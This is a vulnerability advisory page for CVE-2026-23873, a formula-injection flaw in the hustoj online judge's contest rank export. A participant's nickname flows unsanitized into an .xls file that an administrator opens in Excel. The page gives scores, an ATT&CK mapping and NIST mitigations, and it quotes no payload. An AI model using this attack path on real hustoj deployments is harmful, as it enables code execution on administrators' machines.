Cyber Resilience

CVE-2026-23873

MediumPublic PoC

Published: 22 January 2026

Published
22 January 2026
Modified
27 February 2026
KEV Added
Patch
CVSS Score v4 5.2 CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.0051 39.5th percentile
Risk Priority 35 floored blend · peak EPSS

Summary

CVE-2026-23873 is a medium-severity Improper Neutralization of Formula Elements in a CSV File (CWE-1236) vulnerability in Hustoj Hustoj. Its CVSS base score is 5.2 (Medium).

Operationally, exploitation aligns with the MITRE ATT&CK technique Malicious File (T1204.002); ranked at the 39.5th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2026-23873 is a CSV Injection (Formula Injection) vulnerability affecting all versions of hustoj, an open-source online judge platform based on PHP, C++, MySQL, and Linux, used for ACM/ICPC and NOIP training. The issue resides in the contest rank export functionality, specifically the contestrank.xls.php and admin/ranklist_export.php scripts. These components fail to sanitize user-supplied input from the "Nickname" field before incorporating it into an exported .xls file, which is rendered as an HTML table but opened by Microsoft Excel, allowing embedded formulas to execute.

A low-privileged user, such as a registered participant, can exploit this by setting their nickname to a malicious Excel formula. When an administrator exports the contest rank list and opens the file in Microsoft Excel, the formula executes with the administrator's privileges. This can result in arbitrary command execution (RCE) on the administrator's machine or data exfiltration, as indicated by the CVSS v3.1 score of 9.0 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H) and associated CWE-1236.

The GitHub security advisory at https://github.com/zhblue/hustoj/security/advisories/GHSA-gqwv-v7vx-2qjw details the vulnerability but notes that no fix was available at the time of publication on 2026-01-22. Security practitioners should monitor for patches, restrict export access, sanitize nicknames server-side, or advise administrators against opening exports in Excel until remediation.

EU & UK References

Vulnerability details

hustoj is an open source online judge based on PHP/C++/MySQL/Linux for ACM/ICPC and NOIP training. All versions are vulnerable to CSV Injection (Formula Injection) through the contest rank export functionality (contestrank.xls.php and admin/ranklist_export.php). The application fails to sanitize user-supplied input…

more

(specifically the "Nickname" field) before exporting it to an .xls file (which renders as an HTML table but is opened by Excel). If a malicious user sets their nickname to an Excel formula when an administrator exports and opens the rank list in Microsoft Excel, the formula will be executed. This can lead to arbitrary command execution (RCE) on the administrator's machine or data exfiltration. A fix was not available at the time of publication.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1204.002 Malicious File Execution
An adversary may rely upon a user opening a malicious file in order to gain execution.
Why these techniques?

Formula injection into exported .xls enables admin to execute malicious content via opening file (T1204.002 Malicious File), leading to RCE on client workstation.

Confidence: MEDIUM · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2026-24479Same product: Hustoj Hustoj
CVE-2023-51333Shared CWE-1236
CVE-2025-50572Shared CWE-1236
CVE-2023-51311Shared CWE-1236
CVE-2025-56267Shared CWE-1236
CVE-2023-51319Shared CWE-1236
CVE-2024-45084Shared CWE-1236
CVE-2021-47901Shared CWE-1236
CVE-2023-46400Shared CWE-1236
CVE-2026-35157Shared CWE-1236

Affected Assets

hustoj
hustoj
≤ 26.01.31

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Requires filtering and sanitization of information output in exported .xls files to prevent embedding and execution of malicious Excel formulas from unsanitized nicknames.

prevent

Mandates validation of user-supplied inputs like the Nickname field to reject or neutralize formula injection payloads before storage or processing.

prevent

Enforces restrictions on input classes for fields like Nickname using allowlists to block dangerous characters that could form executable Excel formulas.

References